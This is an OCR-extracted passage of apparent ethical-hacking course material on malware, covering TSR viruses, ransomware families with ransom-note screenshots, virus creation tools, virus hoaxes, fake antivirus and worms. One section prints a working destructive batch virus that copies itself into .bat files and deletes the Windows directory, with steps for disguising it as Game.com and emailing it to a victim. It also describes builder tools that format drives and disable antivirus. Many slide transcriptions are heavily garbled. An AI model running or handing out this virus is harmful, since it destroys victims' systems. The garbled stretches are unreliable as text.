The TSR virus remains in memory and therefore has some control over the processes. In
general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt
occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the
user needs to reboot the system to remove the virus without a trace.
The following steps are employed by TSR viruses to infect files:
• Gets control of the system
• Assigns a portion of memory for its code
• Transfers and activates its-elf in the allocated portion of memory
• Hooks the execution of code flow to itself
• Starts replicating to infect files
 Ransomware

Ransomware is a type of malwarethat restricts access to the computer system's files and folders and demands
an on line ransom payment to the malware creator(s) to remove the restrictions

Dharma •
---
Ransomwa.re Families
All your flies have been encrypted!
bharma is a dreadful e ce,ber

•--r;.-----
11, ____on,:,...,.............._...,... __1>1:,,1 __..___.........-,

ransomware that attacks

_ .
__.,.1..... ,.".......-...�

1--�--·--
__ __
l,, _.,,.....,_.,,,.,,,,..n..-•.....-• ..,.1,io.(oo_,___ e CTB-Locker
...
.....-...... ....______
,--------��.....-.....-
victims through email --""" i�•-•• ·-• n. ,_...,.,..,......,,.,,.. ......, ... -•--
campaigns; the ransom ... .,,.. & Sodlnokibl
notes ask the victims to -,.....,_ ,

•"--lllr-·•--
, ___,._ e BltPaymer
contact the threat actors
via a provided email e CryptXXX

r-·-·.-· .........
address and pay In bltcolns 11•-tWl'_a __ .,,..,,_...
,,.. ,.,.,,. __

for the decryption service ...,.,-,.1

•• e Cryptorbit raruomware
.... ,.., ....,.-,
. "'.........�............

Al ___""----"-----
'WL.l,.1, -m\ltNte\twFJb.,, '
e Crypto locker Ransomware

�---� .,...,
o1.,..-...,--<11tooi _____ ,,.,.,.t,1____..,,..... ..-....... -...._
Dharma- Ransom Notes
e Crypto Defense Ran.somware

e Crypto Wa1I Ransomware

Ransornware (Cont'd)

eChOralx ls a new raos.omware that spe:dflcally SamSam ls a notorious ransomware that has
targets Unu,c: devices wllh QNAP Nl!twork Attached lnfected millions of unpatcbed serveB by
eChOraix I SaxnS.un I

_ ___ _____
Storages (NAS} by employing Ille AES encryption employing the RSA-2048 asymmetric
tMhnlque e-ncryptlon tMhnlque

s1&J.1S, V>,-a,1inu Payn1ent

11 you Wan1 doety ptlfl� YOIJI lies send 0,055
-
,,_,.... ... ...
___ _ _........
,,_...,...,

· �-.. ..,_. ----·-----..,�--- -----­

� 8TC(llllC""1}

IO 1h15 addtess: ll.WqmP4ol]WSJShfHWmlUjnvalxfMr21cjm

..

__ _....., - ......
':::, ::.:;;..-.::=.- • ..,..i.-.... .. --... --........ _,.,_ .....

.....i-.-...__ ____ ___.._____ ___ ----·

... ....,... ..'-•-·-----· ----·
....._ .. ., ...__
""'
_ ............. --..,.,.,,.,_,
.
--..•�---�-.,,.. _.,.,c __ ...,1"•-

Check payment �nd get d(!ayptor

�,_ - - ---�•�1 .... -- ----�•--..JO-.. - --···­
----
Ransomware
Ransomware is a type of malware that restricts access to the infected computer system or
critical files and documents stored on it, and then demands an online ransom payment to the
malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the
system's hard disk or merely lock the system and display messages meant to trick the user into
paying the ransom.
Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked
websites, infected programs, app downloads from untrusted sites, vulnerabilities in network
services, and so on. After execution, the payload in the ransomware runs and encrypts the
victim's data (files and documents), which can be decrypted only by the malware author. In
some cases, user interaction is restricted using a simple payload.
In a web browser, a text file or webpage displays the ransomware demands. The displayed
messages appear to be from companies or law enforcement personnel falsely claiming that the
victim's system is being used for illegal purposes or contains illegal content (e.g., porn videos,
pirated software), or it could be a Microsoft product activation notice falsely claiming that
installed Office software is fake and requires product re-activation. These messages entice
victims into paying money to undo the restrictions imposed on them. Ransomware leverages
victims' fear, trust, surprise, and embarrassment to get them to pay the ransom demanded.
Ransomware Families

Some additional ransomware families are as follows:

• Cerber
• CTB-Locker
• Sodinokibi
• BitPaymer
• CryptXXX
• CryptorBit
• Cryptolocker
• CryptoDefense
• CryptoWall
• Police-themed Ransomware
Examples of Ransomware

• Dharma

Dharma is a dreadful ransomware that was first identified in 2016; since then, it has
been affecting various targets across the globe with new versions. It has been regularly
updated with sophisticated mechanisms in recent years. At the end of March 2019,
Dharma struck a parking lot system in Canada. Previously, it also infected a Texas
hospital and some other organizations. The variants of this ransomware have the
following extension: .adobe, .bip, .combo, .cezar, .ETH!, .java. Its encrypted files have
new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption
algorithm to encrypt data and then displays ransom notes. These ransom notes are
named as either lnfo.hta or FILES ENCRYPTED.txt. This ransomware carries out through
email campaigns. The ransom notes ask victims to contact the threat actors via the
provided email address and pay in bitcoins for the decryption service.
 i:d
All your files have been encrypted!
AJl yotJT fifeshavebeenen:;rypteddoetoasearl\y problem with yOIS PC. Jf you want to restore them, wrileus tothee-mall
eacttUldtouns@aol,cc,m
Wrlle lhh 10 In 1hc 1llleof youcmco- /\C1971l68
In case or no answe,- \n 24 hours wrlle us to theese &1nfflls: mcla1,._nelvio@aol.co01
Ya, Mv<O., P"I fo, dea-.,:,om n e..,ons_ The J)riot depends"" t»w fau yw- ID us. Afret paym,nc..,..,
send yw lhe dl!aypoon """""''
wt�alye,.rflo<.

Ff't'e <1ec,ryp110,, M IP-.,..,.,tee

I &:lorep;,vnqvw<a>Wldus � to I� I« rree� ™
11>td11:eo/ lies nustbele,s:g1hlrl lM> (nonadv,'«I), ,nd Iles sl><dd
not..,..,, va.dilerlama!lon, (dmbas8,bad<4>s, lro, _,,.,....,.a:.)

to obUtlfl Bltcolns
Th, -t ..,., ID l;uy- It� ,it,, You'- ID "'O"tlr, d,:I, � bl«n', rd-. lho""" by� meth>d'""
tetm�rornbttbttPoos
Also you can lm01her ii,>ees to t,;y 8'!:onsaridbegrne<slJ.odehere:
�.mxht <9!Jl{JJ[q�l)(:btwpn<{

,....,.,.�fies.
11> de<ryptye,.r dala uong 11-wd party ..itw..-e, ¢ ""'f <aJSe perm,nndala loss.
o( yov fies WIii, !he hot, of 11-wd P«bOS may """4! n<reosed I>"" (11,ey «I:! ,t,.. fee 11> <») « yo,., c,n boco<no o w:om or a-,.

Figure 7.50: Screenshot displaying ransom demand message of Dharma ransomware

• eChOraix
eCh0raix is a new ransomware that specifically targets Linux devices with QNAP
network-attached storage (NAS). It infects and encrypts the victim's machine using the
AES encryption technique. This malware was developed using the Go programming
language, and it has a very limited number of code lines, i.e., 400. Once the malware
infects the system, it communicates with its malicious C2C server via Tor
networks/SOCKSS proxy servers and then initiates the encryption process.
 Status: Waning Payment. .
If you want decrypting your files send 0.055 fe:) BTC(bitcoin)
to this address: 1LWqmP4oTjWS3ShtHWm1UjnvaLxfMr2kjm ee:i
Or use QR code

Check payment and get decryptor

Figure 7.51: Scteerishot displaying ransom demand message of eCI\Oraix ransorriware

• SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018.
It was first discovered in 2016; however, it was considered as a grave ransomware after
the WannaCry attack due to its vast victim base in 2018. SamSam employs the RSA-2048
asymmetric encryption technique to encrypt the acquired local files in the infected
systems. Unlike other ransomware, this ransomware does not attack victims randomly.
This ls a targeted ransomware, which specifically targets certain reputed companies. In
spite of knowing this, large multi-national companies were unable to defend themselves
from such attacks. The attack technique employed by this ransomware is also different
from that employed by other ransomware. Nearly all ransomware uses spam emails to
propagate and perform attacks; however, SamSam employs brute-force tactics against
weak passwords of the Remote Desktop Protocol (RDP).
 Uol. u • e9'�rt.c llt)"I.TtOOn�lu,c e\9'0'ltt-. YN ltHO one h'I tot �ft«ffl.lO■ u.d in4 'ffY r..o-t
Jct yoo n-e..S Pr1••�� t•Y �o r•conr ,our Ul1t•.
Ike�••
I�•• twt po•11bl• IQ TltOO'ftf f'C"llf h1•1 YUllol,T; U1-t« 'n,y

•Ve,.u .&on ...., u, lillui-.a...,ro,w.

J .. ".tl.1 lol'I to )'OQT 00..,11 vu.a • IMC,.1:W,U«I Nfilioaft, YDII �ld irllll u oa yolU: ..u.n.o IC .od all uc.,-pc.•� Ubl ,d,U_ be: t�b4
"'CUr -.$lte W.::-3:t,t.tp;/J"O'!i5�1fil,.9._'llJal._t!ta.!Sil

� l!.1i-co.1t1t .T.di4.N••:w,,v,�ut.,�OcCV�
UC ,- ,.oa. ... _, 1btl"OUl,,f '°'" •11 fie'•• t..•'NI • -.rtt oa ew> HU, wull tA1ll 0.u.11' Jlut. Yrit:llf ·tor- All Uteot:.-d" ,c•,· UI J'9llt G�tl
&,1.1..o U )'911 ..-.at '4V ''" -.u •H•crt•ii- ,c•,· ,_ c-- »•-r 1, IUOOJ.QI ,o nQO- •• u ot "-•vw1u.M1...ay) •W .,,. ... � .. ucy U ,..Ad 2N Wt t.O

for ·.CC,U• "° •r ,.u. 'l"O'O-•c.U•Wl TOI' ........... flllll �u· o,u ··" WJ. Ul V'O;\U" ir.-or OtoW..I'.
tcv eaa IIOWP-l•o cqr __ ".,. '"" <ain.::Lft!"1.=z.: "�attallll:.>llJLa:Wc,:;:....a, � A

l�r• to bvy Bitooiu

� efflc.e l'Od � t,q 11't:cc.la •1a. CUA O.,c,o11-t e--r tliute.nQl..loa � uep.,,sl/.i.oc.Ub.U:G01A9,oai o.r ht.�tl/aiuc..fe..aa.bllylU�t'c.n..pl;p
le� �HT OOQ•t Md "11)' Yetttl"'t.lOf'I -4 ,onit "tOa-1: a.ueou �lctly.

tde•d.li..n•

Figure 7.52: Scfeenshot displaying ransom demand message of SamSam ransomware

Some additional ransomware are as follows:
• Wanna,Cry
• Petya - NotPetya
• GandCrab
• Mega Cortex
• LockerGoga
• NamPoHyu
• Ryuk
• CryptghOst
 How to Infect Systems Using a Virus: Creating a Virus

A virus can be created in two different ways:

e Writing a Virus Program

e Using Virus Maker Tools Send the Game.com me as
an em.a:11 attachment to a
victim

r Create a batch file

Game.bat with this text

Friling a Virus Program I

9 e.cho ott
tor in (*. b•tjdo :
.......................................... $ :

.
Ut

..
L:opy \\t + Game.bat ; :
c: \Windows\-* • : :
.
When run, it copies itself to
Cort\len the Game.bat
all the .bat files in the cur,ent
batch·file to Game.com
directory and deletes all the
using the bat2c.o,m utility
mes in t.he Windows directory

r--
How to Infect Systems Using a Virus: Creating a Virus (Cont'd)

I DELml:'s Batch Virus Maker -, _ ___JPS

__ v_u_u_s_MaJc
__ er____
O!lJllf lJJldl vii u� ,nakt!, tJ�at� Vil U!.�!. U1rJL l:dll iJ�' fOl 111
UsingVuus Maker Tools

tasks such as d��U�g flies on a hard disk drive� disablhtg

admln privileges, cleaning the registry, and kiUlng tasks

Virus Maker Tools

e Bhavesh Virus Maker SKW

e Deadly Virus Maker ___--_ __ .,, ,..,

L:i,,J
ti SonfCBat Batch Virus M�k�r =
....;
e TeraBIT Virus Maker
=
-----....-­
�-a�.._
r,;;;;J

8 AndreinickOS's Batch Virus Maker

"Z�,�::�·--

... m�
6,;11:"c:;.J ...._...

How to Infect Systems Using a Virus

Attackers can infect systems using a virus in the following steps:
• Creating Virus
• Propagating and Deploying Virus
Creating a Virus
A virus can be created in two ways: writing a virus program, and using virus maker tools.
• Writing a Simple Virus Program
The following steps are involved in writing a simple virus program:
1. Create a batch file Game.bat with the following text:
@echo off
for %%f in (*.bat) do copy %%f + Game.bat
del c:\Windows\*.*
2. Convert the Game.bat batch file into Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to tlhe victim
4. When Game.com is executed by the victim, it copies itself to all the .bat files in the
current directory on the target machine and deletes all the files in the Windows
directory
• Using Virus Maker Tools
Virus maker tools allow you to customize and craft your virus into a single executable
file. The nature of the virus depends on the options available in the virus maker tool.
Once the virus file is built and executed, it can perform the following tasks:
o Disable Windows command prompt and Windows Task Manager
o Shut down the system
o Infect all executable files
o Inject itself into the Windows registry and start up with Windows
o Perform non-malicious activity such as unusual mouse and keyboard actions
The following tools are useful for testing the security of your own antivirus software.
o DELmE's Batch Virus Maker
DELmE's Batch Virus Generator is a virus creation program with many options to
infect the victim's PC, such as formatting the C: drive, deleting all the files in the hard
disk drive, disabling admin privileges, cleaning the registry, changing the home page,
killing tasks, and disabling/removing the antivirus and firewall.
 OfnerOptions

I WectReolvl� 11 lnfea/>loi- 11 WectlHdd.,.

I Wect s,,..'-'P - I[ Infect ,,.,..,..,.b., I LWea ...,.. i;,,,d
Fiiec,,,e 1-fedlon
I Wect />ll Exe - )I Wect,., .Irie Fies I I Infect,., Doc Files
I Wed,., ,,. Fies ][ Wd />ll Pcf - 1 LWectN -� Ries
e

I Wecl />ll .Mp3 file, ] ! Wed Al .lo\>4 R.. I � Wed Al .Png Fie,
Infect Alelype
Ent« Ale E,t......, To Wea (cg 'bt1

lnl«net S,,,.adilg
I Send To Ccttaci> I Senos 11M To pjl Con!acls On J'1icro-,11 Oullool<
�Ml;mailAnachmert

DEi.me, 8'<ch v.,,, Make< Wo

DE\lnE"s l!atch Vrv, Make,,
Veraon: 2.0
• Scoii,ting �: ""ohl 3.0.0
Coded By: DE\lnE
Coded for: l.\entiers of HadcFaums.Ne!
To c:orjactme visit. Hockfuuma,Nct and !end me e measoge
Please view 1he User� bycllcltnilhe "Ageeme<t t..c1on· and malt,
sn )'CIUfully IX!derdand .and.agree wihthe ageetr.iefl
Sava lie T:d

Figure 7.53: Screenshot of D.ELmE's Batch Virus Maker

o JPS Virus Maker

JPS Virus Maker tool is used to create customized viruses. It has many in-built
options to create a virus. Some of the features of this tool are auto-startup, disable
task m;in;iger, dis;ible control p;inel, en;ible remote desktop, t1)rn off Windows
Defender, etc.
 Figure 7.54: Working of JPS Virus Maker

Some additional virus maker tools ar-e as follows:

• Bhavesh Virus Maker SKW
• Deadly Virus Maker
• SonlcBat Batch Virus Maker
• TeraBIT Virus Maker
• AndreinickOS's Batch Virus Maker
 How to Infect Systems Using a Virus: Propagating and
Deploying a Virus
Virus Hoaxes Google Critical Security Alert Seam

Hoaxes are false alarms claiming reports

about a non-existing virus that may
contain virus attachments
Go gle
U Warning messages propagating that a
certain email message should not be
viewed and doing so will damage one's New device signed in to
system
Some of the famous virus hoaxes are as
follows: Yom Googlr." Ac:count ns Jll5' �med 111 to nou, • nb\t VllndoWs device. Youtt gemng 1111,
erna,1 10 tnakt ,ure Illa! orn "(Ou.
8 Applecare
8 Bangkok 8.5 Earthquake Video 1!15ifi:Mhi
8 Chrome critical error
You ,eo:e...,,u ,1111 -·· !1 WI IOU� tibo,Jt••If!.,.,.., t1•t"'J�lo yt..11 � A(C0""' ..
d ,eo.kft
8 Compromising video C�11Qll')Q•� !�!1�11,,.,,,,�P,,_.,.,, U..,,,W.11\,._ C.t.9•1141 USA

How to Infect Systems Using a Virus: Propagating and

Deploying a Virus (Cont'd)
Fake Antivirus Free Antivirus 2019
... 0. 41 0 l '
�

n ..
� I A11!<v!t14 •
J A well-designed, fake afitivirus looks authentic
and often encourages users to install it on
their systems, perform updates, or remove -·-
ANAn11vw\1•1019•�&
Ole1111Virus .,,-__ Antlvln.Hl
¼•• ••
..
-- __:.::;�t:!::.--
viruses and other malicious programs �� ,,, , ,,,.,,

Once installed, these fake antiviruses can .,..

damage target systems like other malwares ,...
\CD .i.••

fake Antivirus Programs

8 AntMrus Pro 2017

ft PCSecureSy�tem
" AntlVlrus 10
8 TotalAV

Propagating and Deploying a Virus

After creating viruses, attackers can adopt various virus propagation and deployment
techniques to transfer the virus to the victim's machine. Some of these techniques are as
follows:

• Virus Hoaxes
• Fake Antivirus
Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to
introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of loss of productivity and
bandwidth while naive users react to them and forward them to other users. Because viruses
tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes
are false alarms claiming reports of nonexistent viruses.
The following are some critical features of virus hoaxes:
• These warning messages, which can be rapidly propagated, state that a particular e-mail
message should not be opened, and that doing so would damage one's system.
• In some cases, these warning messages themselves contain virus attachments.
Try to crosscheck the identity of the person who has posted the warning.
It is a good practice to look for technical details in any message concerning viruses.
Furthermore, search for information on the Internet to learn more about hoaxes, especially by
scanning bulletin boards on which people actively discuss current community
happenings/concerns. Before jumping to conclusions by reading Internet information, first,
check the following:
■ If the information is posted by newsgroups that are suspicious, cross-check the
information with another source.
• If the person who has posted the news is not an expert or a known person in the
community, crosscheck the information with another source.
• If a government body has posted the news, the posting should also have a reference to
the corresponding federal regulation.
• One of the most effective checks is to look up the suspected hoax virus by name on
antivirus software vendor sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched, in which threat actors spread Google Critical
Security Alert messages to victims. Google Critical Security Alert is a service provided by Google
to notify its users regarding any activity related to their accounts. The activities can include
logging in, changing passwords, changing personal information, etc. Attackers create and send
fake alert emails to victims, thereby notifying them that the aforementioned activities have
taken place. By looking at the critical alert email, the user clicks the link provided in the email
and subsequently gets infected. The figure below describes a hoax email stating "New device
signed in to." By looking at this email without noting the email source, the victim clicks the
"CHECK ACTIVITY" button and gets trapped.
 Google 9Apr
tome •

Go gle

New device signed in to

Your Google Account was just signed in to from a new Windows device. You're getting this
email to make sure that ii was you.

I CMECK ACTIVITY

You ,ecelved this en,ail 10 let you know about Important changes 10 your Google Account and services
� 2018 Google Inc .1600 Amphitheatre Parkway. Mountain Vle,e CA 94043. USA

Figure 7.55: Screenshot of Google Critical Security Alert Scam

Some additional virus hoaxes are as follows:

• AppleCare
• Bangkok 8.5 Earthquake Video
• Chrome critical error
• Compromising video
Fake AntiVirus
Fake or rogue antivirus software is a form of Internet fraud based on malware. It appears and
performs similarly to a real antivirus program. Fake antivirus software is often displayed in
banner ads, pop-ups, email links, and search engine results when searching for antivirus
software. A well-designed fake antivirus software looks authentic and often encourages users
to install it on their systems, perform updates, or remove viruses and other malicious programs.

Upon clicking the ad, pop-up, or link to install the antivirus software, users are redlrected to
another page where they are prompted to buy or subscribe to that antivirus software by
entering their payment details. Fake antivirus software can cause severe damage to systems
once downloaded and installed; e.g., they infect systems with malicious software, steal
sensitive information (e.g., passwords, bank account numbers, credit card data), and corrupt
files.
Ethical Hacking and Countermeasures
Matwarc;.Thrcats

At present, a new fake antivirus trend has emerged. Fake antivirus tools are rapidly
proliferating the mobile application space. According to AV-Comparatives research, two-thirds
of all antivirus applications present in the Android Play Store are fake.
• Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It is intended to eliminate
viruses and other malware from mobile devices. However, when it is scanned by itself, it
is indicated as a Medium Risk, as shown in the screenshot below.
o • :.1 a 10:21
� Google Play

Free Antivlrus 2019 • Scan &

Clean Virus
...... COit/
T..,,

N!Jn41M Ad• Oitplayed

..-n Displays ads whil• In use, Tho ads are
T-..u eommon ,n rree apps.
IK1r,-1

Figure 7.S6: Screenshot of AntiVirus Pro 2017 Fake AntiVirus

Some additional fake antivirus programs are as follows:

• AntiVirus Pro 2017
• PCSecureSystem
• Antivirus 10
• TotalAV
Ethical Hacking and Countermeasures
Matwarc;.Thrcats

Computer Worms

-.I Computer worms are malicious programs How is a Worm Different from a Virus?
that Independently replicate, execute, and
spread across the network connections,
A Wonn Replicates on its own
thus consuming available computing resources
without human interaction
A worm is a special type of malware that can
.l Attackers use worm payloads to Install backdoors replicate itself and use memory but cannot attach
in infected computers, which turns them into itself to other programs
tombles and creates a botnet; these botnets can
be used to perform further cyber attacks J A Worm Spreads through the Infected Network

A worm takes advantage of file or information

Worms:
transport features on computer systems and
e Monero automatically spreads through the infected
network but a virus does not
e Bondat
e Beapy

Computer Worms

Computer worms are standalone malicious programs that replicate, execute, and spread across
network connections independently without human intervention. lntr.uders design most worms
to replicate and spread across a network, thus consuming available computing resources and, in
turn, causing network servers, web servers, and individual computer systems to become
overloaded and stop responding. However, some worms also carry a payload to damage the
host system.
Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some
cases, the worm's host machine is also infected. Initially, black hat professionals treated worms
as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on
and targeted Windows OS using the same worms by sharing them in via e-mail, IRC, and other
network functions.
Attackers use worm payloads to install backdoors on infected computers, which turns them
into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some
of the latest computer worms are as follows:
• Manero
• Bondat
• Beapy
Ethical Hacking and Countermeasures
Matwarc;.Thrcats

How is a Worm Different from a Virus?

Virus Worm
A virus infects a system by inserting itself A worm infects a system by exploiting a vulnerability
into a file or executable program in an OS or application by replicating itself
It might delete or alter the content of files or Typically, a worm does not modify any stored
change the location of files in the system programs; it only exploits the CPU and memory
It alters the way a computer system It consumes network bandwidth, system memory,
operates without the knowledge or consent etc., excessively overloading servers and computer
of a user systems
A virus cannot spread to other computers A worm can replicate itself and spread using IRC,
unless an infected file is replicated and sent Outlook, or other applicable mailing programs after
to the other computers installation in a system
A virus spreads at a uniform rate, as
A worm spreads more rapidly than a virus
programmed
Viruses are difficult to remove from infected Compared with a virus, a worm can be removed
machines easily from a system
Table 7.4: Difference between virus and worm